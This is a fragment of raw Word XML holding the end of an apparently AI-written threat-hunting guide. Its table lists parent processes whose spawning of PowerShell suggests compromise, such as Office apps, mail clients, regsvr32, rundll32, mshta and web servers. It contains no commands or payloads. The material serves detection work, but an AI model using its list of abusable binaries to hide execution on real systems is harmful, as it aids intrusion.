            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401A60CE" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:lastRenderedPageBreak/>
              <w:t>excel.exe, winword.exe, powerpnt.exe, visio.exe, msaccess.exe, mspub.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0088B7" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Office apps spawning PowerShell suggests malicious macros or embedded scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="7D8B5D56" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57810AFE" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>outlook.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8FA3CB" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Email client launching PowerShell → phishing payload execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="1B9215D9" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6688AE17" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>regsvr32.exe, rundll32.exe, mshta.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248BA051" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Living-off-the-land binaries often abused to execute PowerShell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="0F6DE9DC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5CF82D" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>httpd.exe, nginx.exe, php-cgi.exe, tomcat, w3wp.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA9C816" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve">Web servers spawning PowerShell → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>webshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve"> or exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="602CD498" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B145B0" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>sqlserver.exe, sqlservr.exe, sqlagent.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59CB1D38" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Database services rarely invoke PowerShell; indicates compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="60C2EBD0" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E4B099" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>services.exe, wmiprvse.exe, jbosssvc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A57AE35" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>Service processes spawning PowerShell → persistence or lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w14:paraId="70F6077B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30DD6C1F" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t>amigo.exe, browser.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3989A7C5" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
            <w:r w:rsidRPr="00AE2D4F">
              <w:t xml:space="preserve">Uncommon executables; often renamed malware droppers. </w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidRPr="00AE2D4F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Fortinet Online Help</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2989EE80" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00000000" w:rsidP="00AE2D4F">
      <w:r>
        <w:pict w14:anchorId="7902310D">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8F5EDF" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> These frameworks and cmdlets are powerful offensive tools, but defenders can detect them by monitoring </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell command lines, script blocks, and unusual parent processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36375798" w14:textId="77777777" w:rsidR="00AE2D4F" w:rsidRPr="00AE2D4F" w:rsidRDefault="00AE2D4F" w:rsidP="00AE2D4F">
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve">Would you like me to also create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>visual detection cheat sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2D4F">
        <w:t xml:space="preserve"> (like a table mapping each framework/cmdlet to MITRE ATT&amp;CK techniques) so it’s easier to use in threat hunting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922991B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16824510" w14:textId="77777777" w:rsidR="00C9674C" w:rsidRDefault="00C9674C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050CA1D2" w14:textId="77777777" w:rsidR="00C9674C" w:rsidRPr="00C9674C" w:rsidRDefault="00C9674C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C9674C" w:rsidRPr="00C9674C" w:rsidSect="002517B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AB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40B0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52C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA8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B67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F19EE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128CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9216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82A36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="167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10EA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C9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94B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93C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E67D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DCE6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E45D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72C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E796D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45F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96504"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DC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45ABA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC827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556F59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA1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C6137"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC6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C7EE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EEE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B57EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C98E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C0CAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B364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52B6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CF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76F38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F6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90FD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27E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070B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="464AE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77EF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C406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100F98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B81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E1F50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03D43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D91F9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B230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41B85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D99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D4698"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6F8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55E21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3F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E1BBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AED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B1FBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B5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F32A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37F4D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DA3950"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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B278D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2700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8A066E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F5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826BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8656F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BE5CE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7A44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C84B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD4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E0C33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FD4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821A9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F0F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C46767"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="422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F51E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C50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C225C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D516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0206C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C06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C07699"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A5E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A239C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FA8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147D9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1EC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E2123"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB46B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6E5705"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48C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300B4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACE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7714ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B6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309E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63F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8E7092"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9B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03E6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72D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CB7A90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53D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3001D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B81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3D0D8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF8F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B32F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F66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D31B64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB7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3D51CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BB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705F1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF7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B8248B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="211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C95858"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F16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F90282"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD2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A850BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="156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E51FB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5E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00375F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4C27E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B33611"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB8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D5F5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="918AF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880EBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1EC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6B3822"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C2665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777F73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E4C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330CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E09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E7801"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="417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824D60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61B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2474E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D5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F82C3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DF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691520"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FF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604DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21B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44958"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0544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0503DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51CA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323868"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6618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102037">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1220359732">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="945388415">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="985860804">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="592319805">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="965816891">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2007440301">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1164932975">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1007949949">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="292911818">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="124785016">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1984457543">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2071272829">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="594166007">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1837113382">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="114494708">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1713112365">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1669209515">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1350331767">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1352219523">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1699773500">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1017149896">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1294095114">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="112479444">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1128087269">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1329095862">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1239561681">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1747267374">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1398355119">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="16083884">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="685205719">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="2038658472">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1168211683">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="933635956">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="376901438">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1641762711">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="462424948">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1725333322">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1920671793">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1462992567">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="2012753556">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="779951082">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="648873067">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1244334275">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1038701366">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1443843234">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="282002110">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1448616822">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1154250336">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1734037914">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1125462044">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="868183995">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="655651167">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1102914167">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1694720293">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="611523498">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="585572855">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="127402654">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1515880175">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1259219534">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1857113415">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="52509557">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1421095642">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1218130526">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="958297932">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="1886333071">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1522746995">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1919754116">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="391583166">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="625700049">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="109201654">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1776944985">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="1620991855">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="1416973014">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1280989573">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="1663461798">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="1624728516">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="1718969251">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="1402370070">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="465977085">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="1226065316">
    <w:abstractNumId w:val="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4C"/>
    <w:rsid w:val="000045E4"/>
    <w:rsid w:val="000073D4"/>
    <w:rsid w:val="00011E9E"/>
    <w:rsid w:val="000C2847"/>
    <w:rsid w:val="0014291C"/>
    <w:rsid w:val="00185670"/>
    <w:rsid w:val="00187D4E"/>
    <w:rsid w:val="001A3DCB"/>
    <w:rsid w:val="001A4E35"/>
    <w:rsid w:val="001A6BEF"/>
    <w:rsid w:val="001B5C7D"/>
    <w:rsid w:val="001D39B8"/>
    <w:rsid w:val="001E6EF1"/>
    <w:rsid w:val="001F6F56"/>
    <w:rsid w:val="00243717"/>
    <w:rsid w:val="002517B7"/>
    <w:rsid w:val="002917A7"/>
    <w:rsid w:val="002A3003"/>
    <w:rsid w:val="002A6CC9"/>
    <w:rsid w:val="002B71BD"/>
    <w:rsid w:val="002C6874"/>
    <w:rsid w:val="003725E7"/>
    <w:rsid w:val="00374968"/>
    <w:rsid w:val="00394391"/>
    <w:rsid w:val="003E1D75"/>
    <w:rsid w:val="003F7865"/>
    <w:rsid w:val="0040643E"/>
    <w:rsid w:val="004326AC"/>
    <w:rsid w:val="00436F62"/>
    <w:rsid w:val="004412F2"/>
    <w:rsid w:val="00467BB1"/>
    <w:rsid w:val="004C1183"/>
    <w:rsid w:val="004C676D"/>
    <w:rsid w:val="004E769B"/>
    <w:rsid w:val="0053340E"/>
    <w:rsid w:val="00571154"/>
    <w:rsid w:val="00571905"/>
    <w:rsid w:val="005A2E43"/>
    <w:rsid w:val="005F49FC"/>
    <w:rsid w:val="00610B8A"/>
    <w:rsid w:val="0062316F"/>
    <w:rsid w:val="00646E33"/>
    <w:rsid w:val="006613C4"/>
    <w:rsid w:val="006659B1"/>
    <w:rsid w:val="00667417"/>
    <w:rsid w:val="006C710E"/>
    <w:rsid w:val="006F5AC4"/>
    <w:rsid w:val="00760FDB"/>
    <w:rsid w:val="007B711E"/>
    <w:rsid w:val="007C693E"/>
